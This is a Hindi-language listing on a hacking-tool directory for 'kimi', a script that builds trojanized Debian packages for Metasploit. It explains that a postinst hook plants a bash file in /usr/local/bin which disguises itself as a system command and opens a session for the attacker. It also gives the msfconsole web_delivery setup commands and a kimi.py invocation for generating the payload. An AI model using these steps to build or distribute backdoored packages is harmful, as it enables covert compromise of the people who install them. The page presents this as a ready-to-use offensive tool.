Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
kimi — दुर्भावनापूर्ण debian packages (debain trojans) उत्पन्न करने की स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/chaitanyaharitash/kimi
शोषण फ्रेमवर्कपेलोड जनरेशनपोस्ट-शोषणमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubchaitanyaharitash/kimi

kimi

दुर्भावनापूर्ण debian packages (debain trojans) उत्पन्न करने की स्क्रिप्ट।

रिपॉजिटरी देखें
1235467 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

kimi - दुर्भावनापूर्ण डेबियन पैकेज जनरेटर

दुर्भावनापूर्ण डेबियन पैकेज (डेबियन ट्रोजन) उत्पन्न करने की स्क्रिप्ट।

परिचय एवं लाभ एवं उपयोग एवं परीक्षण किया गया :::

root@kitploit:~
किमी नाम "किमिमारो" से प्रेरित है, जो "नारुतो" नामक एनीमे का मेरा पसंदीदा पात्र है।

किमी एक स्क्रिप्ट है जो मेटास्प्लॉइट के लिए दुर्भावनापूर्ण डेबियन पैकेज उत्पन्न करती है,
जिसमें एक bash फ़ाइल होती है। bash फ़ाइल को "/usr/local/bin/" निर्देशिका में तैनात किया जाता है।

बैकडोर तब निष्पादित होता है जब पीड़ित postinst फ़ाइल के कारण डेब पैकेज स्थापित करने का प्रयास करता है।

bash फ़ाइल इंजेक्ट करती है और कुछ सिस्टम कमांड की तरह कार्य करती है, जिसे जब पीड़ित निष्पादित करता है
और हमलावर सत्र प्राप्त करता है।

लाभ :
-- पूरी तरह से स्वतंत्र। अर्थात उपयोगकर्ता को कोई डेबियन पैकेज निर्माता स्थापित करने की आवश्यकता नहीं है।
-- तर्कों के उपयोग के कारण किसी भी पेलोड जनरेटर के साथ आसानी से एकीकृत किया जा सकता है (मुझे पता है, बेवकूफी है :P)

किमी मूल रूप से web_delivery मॉड्यूल पर निर्भर करता है और सब कुछ स्वचालित है।
हमलावर को केवल निम्नलिखित सेटिंग्स करनी होती हैं:

msf में Web_Delivery सेट करना:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

दुर्भावनापूर्ण पेलोड उत्पन्न करना:

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

नोट :: यह प्रोजेक्ट Venom Shellcode Generator 1.0.13 के साथ एकीकृत करने के लिए बनाया गया था।
इसका उपयोग स्टैंडअलोन भी किया जा सकता है, उपयोगकर्ता को केवल msf वेरिएबल्स में uripath बदलने की आवश्यकता है।
-------------------------------------------------------------------------------------

परीक्षण किया गया:
            Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
            ParrotOS (Debian Jessie)
            Kali Rolling 2.0

अद्यतन :::

root@kitploit:~
[फरवरी-22-2017]
-- एम्बेडेड दुर्भावनापूर्ण फ़ाइल निष्पादन को स्वचालित बनाने के लिए "postinst" फ़ाइल निर्माण फ़ंक्शन जोड़ा गया
-- हैंडलर खोलने के साथ पूरी तरह से स्वचालित करने के लिए RC फ़ाइल निर्माण फ़ंक्शन जोड़ा गया, अर्थात मैन्युअल रूप से हैंडलर सेट करने की आवश्यकता नहीं
-- कुछ सामान्य बग ठीक किए गए [विशेष धन्यवाद r00t 3xp10it :)]

[अक्टूबर-12-2017]
-- आर्किटेक्चर (i386/amd64) चुनने के लिए कमांड लाइन तर्क (-a/--arch) जोड़ा गया

[अप्रैल-24-2019] - परीक्षण रिलीज़।
-- अब कस्टम URI और LPORT सेट किए जा सकते हैं
-- Python पेलोड को python 2/3 और Metasploit 5 के नवीनतम संस्करण के अनुसार अपडेट किया गया है।
-- पूरे कोड को पुनः कार्यान्वित किया गया है, हालांकि यह अभी भी python 2.7 का समर्थन करता है

स्क्रीनशॉट :::

Main Banner Kimi In Action

विविध :::

root@kitploit:~
   ब्लॉग पोस्ट     : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
   YouTube वीडियो : https://youtu.be/Dsn6BRHy9_w
   विरुटोटल नमूना (क्योंकि मैंने इस स्क्रिप्ट का दुरुपयोग जंगल में देखा): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

धन्यवाद :::

Suspicious Shell Activity [Red Team]

संदेह? अपमान?

ट्विटर : @bofheaded

टूल डाउनलोड करें